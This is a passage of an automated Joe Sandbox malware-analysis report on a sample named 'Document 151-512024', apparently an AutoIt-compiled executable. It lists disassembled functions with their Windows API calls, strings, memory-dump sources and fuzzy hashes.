Instruction Fuzzy Hash: 7B41D534641641AFDB11CF65CC99BE57BF4FB0A754F1882AAE6284B363CB31A842CB40

Function 009AC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009AC913

Strings

stop, xrefs: 009AC8E4
warning, xrefs: 009AC8FC
question, xrefs: 009AC8CC
blank, xrefs: 009AC895
info, xrefs: 009AC8B4

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 8cede7d259710edc24127d932dc6cfe17303f6f6b6ed66dcdf9cea27072a28fd
Instruction ID: 4c2a4e00965367e5df4c5b3013df748d325112cda85248d0962098b000d101fe
Opcode Fuzzy Hash: 8cede7d259710edc24127d932dc6cfe17303f6f6b6ed66dcdf9cea27072a28fd
Instruction Fuzzy Hash: F2112B7568930ABAE7015B94AC82DAB27DCEF56318B10042EF500AA2C2D7A45E0062E5

Function 009AED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009AED2A
_wcslen.LIBCMT ref: 009AED3B
_wcslen.LIBCMT ref: 009AED79
_wcslen.LIBCMT ref: 009AEDAF
_wcslen.LIBCMT ref: 009AEDDF
_wcslen.LIBCMT ref: 009AEDEF
_wcslen.LIBCMT ref: 009AEE2B
_wcslen.LIBCMT ref: 009AEE5A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: ac10c00ef252f2fe5ac4765905bc6fe8c2943a448cd86fe6c40819c8b53b648a
Instruction ID: d1963fe18be2fb648e9b3f5c7a39956859a49343e058cc6d2a9044c021731213
Opcode Fuzzy Hash: ac10c00ef252f2fe5ac4765905bc6fe8c2943a448cd86fe6c40819c8b53b648a
Instruction Fuzzy Hash: 27419265D1121875DB11EBF4888AACFB7ACAF86710F508462F528E3121FB34E255C7E5

Function 0095F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 0095F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 0099F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 0099F454

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 602db4c9c67f63b0ab722d0ef655fcd3113d82980831112e19be923ca18c7e80
Instruction ID: 0e815470e662a1871cfbbdcc84b0c6a62b2f17b05319cb9e41063993c9c37a62
Opcode Fuzzy Hash: 602db4c9c67f63b0ab722d0ef655fcd3113d82980831112e19be923ca18c7e80
Instruction Fuzzy Hash: 4A414031108E40BACB34CB3ED8BC76ABB99AB563B2F14443DE84792560C63694C8D711

Function 009D2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009D2D1B
GetDC.USER32(00000000), ref: 009D2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009D2D2E
ReleaseDC.USER32(00000000,00000000), ref: 009D2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009D2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009D2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009D5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 009D2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009D2DE1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cc60f82656606e13d7e8cf437001bfe7be7c33eeaa3d6c52f314c95b2d691763
Instruction ID: da83df8075a0daa859e26cafe0bd4fc0459dff344a386851455910f80b5d6aeb
Opcode Fuzzy Hash: cc60f82656606e13d7e8cf437001bfe7be7c33eeaa3d6c52f314c95b2d691763
Instruction Fuzzy Hash: AC319F72296214BFEF114F50CC89FEB3BADEF19711F044056FE089A291C6759C80C7A0

Function 009A5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 009A5637
_memcmp.LIBVCRUNTIME ref: 009A5659
_memcmp.LIBVCRUNTIME ref: 009A5671
_memcmp.LIBVCRUNTIME ref: 009A5684
_memcmp.LIBVCRUNTIME ref: 009A569E
_memcmp.LIBVCRUNTIME ref: 009A56B1
_memcmp.LIBVCRUNTIME ref: 009A56C9
_memcmp.LIBVCRUNTIME ref: 009A56E4

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 2f8aaa55b237fab4f057b4a814edd7cdc259444d311e755bb1312d7dae4547ee
Instruction ID: 8a16885b4fdb7ea8d15f9e9cea112af35d815d7712ab92341f9f032e3c86144c
Opcode Fuzzy Hash: 2f8aaa55b237fab4f057b4a814edd7cdc259444d311e755bb1312d7dae4547ee
Instruction Fuzzy Hash: 1121EB71780A09BBD61856208E93FFB335CAFA2388F498431FD169A781F725ED2081E5

Function 009C4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 009C502E, 009C5383
Not an Object type, xrefs: 009C5007

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5205f6739490237f655d05689efacd8c00ad9a70964ef2235654782ea1800d74
Instruction ID: 86be79370a0bc7718f40092894605e9e5762784c9265c97d75eab89bd8219218
Opcode Fuzzy Hash: 5205f6739490237f655d05689efacd8c00ad9a70964ef2235654782ea1800d74
Instruction Fuzzy Hash: 9DD18E71E0060A9FDF10CF98C885FAEB7B9BB48344F15856DE915AB281E770ED81CB91

Function 00981522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009815CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00981651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009817FB,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009816E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009816FB

Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00981777
__freea.LIBCMT ref: 009817A2
__freea.LIBCMT ref: 009817AE

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: b3d80e15013ab1c8f1613d498b35a0c907fca8e77c7c01388b60ffe7d6226981
Instruction ID: cc59b35a1e3fc79edc38fd90a8c5cd64df728229ad2017f58ab3933d1f316609
Opcode Fuzzy Hash: b3d80e15013ab1c8f1613d498b35a0c907fca8e77c7c01388b60ffe7d6226981
Instruction Fuzzy Hash: 2A91A572E002169ADF20AE74C881EEE7BBD9F49750F184659F806E7341D739DD82CB60

Function 009C4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009C4648
VariantInit.OLEAUT32(?), ref: 009C4749
VariantClear.OLEAUT32(?), ref: 009C4753
VariantClear.OLEAUT32(?), ref: 009C47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 009C472C
Null Object assignment in FOR..IN loop, xrefs: 009C45D8, 009C4706, 009C47BE

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 94cb03497bdfca6b06dd2209dded223a6539e31744f9880bc022c78862b54330
Instruction ID: 154e7d72279148ebf2317506506355566a12ab94245dbdceac3e6f4a212563d3
Opcode Fuzzy Hash: 94cb03497bdfca6b06dd2209dded223a6539e31744f9880bc022c78862b54330
Instruction Fuzzy Hash: FC919E71E00219ABDF20CFA5C898FAEBBB8EF86714F10855DF505AB280D7749945CFA1

Function 009B1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 009B125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 009B1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009B12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009B1430

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 67d642902e3f743adf1bf4fbe2782d286afbabc2d33b66e48d86e0ec174ba057
Instruction ID: 660061718b9cfc527423de05bf1684ee07182dea350e295c71e67c1e6352edbc
Opcode Fuzzy Hash: 67d642902e3f743adf1bf4fbe2782d286afbabc2d33b66e48d86e0ec174ba057
Instruction Fuzzy Hash: CB910471A10219AFDB00DF98C9A4BFEB7B9FF85331F504429E910E72A1D774A941CB90

Function 0095948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 84bb4e0f449c4ccbb843a87080ec1961d5ad925f02200c08ca7cac39d6685e01
Instruction ID: eff57ef0f548c848fca1dc2b81088b2a7886c51db3fe80b7736e8bd8617e4b5f
Opcode Fuzzy Hash: 84bb4e0f449c4ccbb843a87080ec1961d5ad925f02200c08ca7cac39d6685e01
Instruction Fuzzy Hash: BA914571D04219EFDB10CFAAC884AEEBBB8FF88320F148455E915B7251D738A956CB60

Function 009C3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009C396B
CharUpperBuffW.USER32(?,?), ref: 009C3A7A
_wcslen.LIBCMT ref: 009C3A8A
VariantClear.OLEAUT32(?), ref: 009C3C1F

Part of subcall function 009B0CDF: VariantInit.OLEAUT32(00000000), ref: 009B0D1F
Part of subcall function 009B0CDF: VariantCopy.OLEAUT32(?,?), ref: 009B0D28
Part of subcall function 009B0CDF: VariantClear.OLEAUT32(?), ref: 009B0D34

Strings

Incorrect Parameter format, xrefs: 009C39A6, 009C3BA1
AUTOIT.ERROR, xrefs: 009C3A80, 009C3A85

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 0b6737b391410c1029985b2aeba4b3d74d724366e1d6f91b5e5899d8f7c79f8e
Instruction ID: 0f23e8b7ffb159f3c11c6d982d6327c441fc8dce9cc8d32d8944f950e6be6ab5
Opcode Fuzzy Hash: 0b6737b391410c1029985b2aeba4b3d74d724366e1d6f91b5e5899d8f7c79f8e
Instruction Fuzzy Hash: 35913675A083059FC704DF28C490A6AB7E8FF89314F14896DF8899B351DB31EE45CB92

Function 009C4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 009A000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?,?,009A035E), ref: 009A002B
Part of subcall function 009A000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0046
Part of subcall function 009A000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0054
Part of subcall function 009A000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?), ref: 009A0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 009C4C51
_wcslen.LIBCMT ref: 009C4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 009C4DCF
CoTaskMemFree.OLE32(?), ref: 009C4DDA

Strings

NULL Pointer assignment, xrefs: 009C4E23, 009C4E52

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: a5bab4f1a6ab141a59818c5168b1da2f1a5ded03c67bc9155b4ec93d22c620b4
Instruction ID: db23fae26a8a83d10bd018b445ed43c2d467ba7389c060ee58ea5d472787d406
Opcode Fuzzy Hash: a5bab4f1a6ab141a59818c5168b1da2f1a5ded03c67bc9155b4ec93d22c620b4
Instruction Fuzzy Hash: 0E910471D00219AFDF14DFA4D891FEEB7B8BF48310F10856AE915A7291DB349A44CFA1

Function 009D20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 009D2183
GetMenuItemCount.USER32(00000000), ref: 009D21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009D21DD
_wcslen.LIBCMT ref: 009D2213
GetMenuItemID.USER32(?,?), ref: 009D224D
GetSubMenu.USER32(?,?), ref: 009D225B

Part of subcall function 009A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A3A57
Part of subcall function 009A3A3D: GetCurrentThreadId.KERNEL32 ref: 009A3A5E
Part of subcall function 009A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009A25B3), ref: 009A3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009D22E3

Part of subcall function 009AE97B: Sleep.KERNEL32 ref: 009AE9F3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 0d6d0ed22bff32962c743c867147fb83141178ada9f0ffb8f066904167e676a5
Instruction ID: f600bcfa780d46ccc6c750c645409c5e623300340011dcac2c49d97b6b7ebacb
Opcode Fuzzy Hash: 0d6d0ed22bff32962c743c867147fb83141178ada9f0ffb8f066904167e676a5
Instruction Fuzzy Hash: 2C719D75A44205AFCB14DFA4C841AAEB7F5EF98320F14C45AF926AB341D734ED41CB90

Function 009AAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 009AAEF9
GetKeyboardState.USER32(?), ref: 009AAF0E
SetKeyboardState.USER32(?), ref: 009AAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 009AAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 009AAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 009AAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009AB020

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 59af75484daf80111a89685e1cab803269b43eef23945e2f7d06e1aa85a06f81
Instruction ID: 8792e7748a8d30af04be2f8ab4620a0ea8e830c4f274422562f24a88a065f550
Opcode Fuzzy Hash: 59af75484daf80111a89685e1cab803269b43eef23945e2f7d06e1aa85a06f81
Instruction Fuzzy Hash: 1C51A1A06147D63EFB3642348C45BBABEAD5B07304F08858AE1E9558C3D3D9ECC4D791

Function 009AACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009AAD19
GetKeyboardState.USER32(?), ref: 009AAD2E
SetKeyboardState.USER32(?), ref: 009AAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009AADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009AADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009AAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009AAE38

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0dcba8a9e8589d95af4c7b6e1b57188c4ba9b34e2265d1eb7ee80914c13bb28e
Instruction ID: f78e8e26669f7d9f247fee62572a5dd12f04fe058d8cb0194bd935b264c7b697
Opcode Fuzzy Hash: 0dcba8a9e8589d95af4c7b6e1b57188c4ba9b34e2265d1eb7ee80914c13bb28e
Instruction Fuzzy Hash: 7751C2A15487D63EFB3782248C55B7ABEAC6B47300F188489E1D5568C2D394EC88E7A2

Function 0097542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00983CD6,?,?,?,?,?,?,?,?,00975BA3,?,?,00983CD6,?,?), ref: 00975470
__fassign.LIBCMT ref: 009754EB
__fassign.LIBCMT ref: 00975506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00983CD6,00000005,00000000,00000000), ref: 0097552C
WriteFile.KERNEL32(?,00983CD6,00000000,00975BA3,00000000,?,?,?,?,?,?,?,?,?,00975BA3,?), ref: 0097554B
WriteFile.KERNEL32(?,?,00000001,00975BA3,00000000,?,?,?,?,?,?,?,?,?,00975BA3,?), ref: 00975584

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
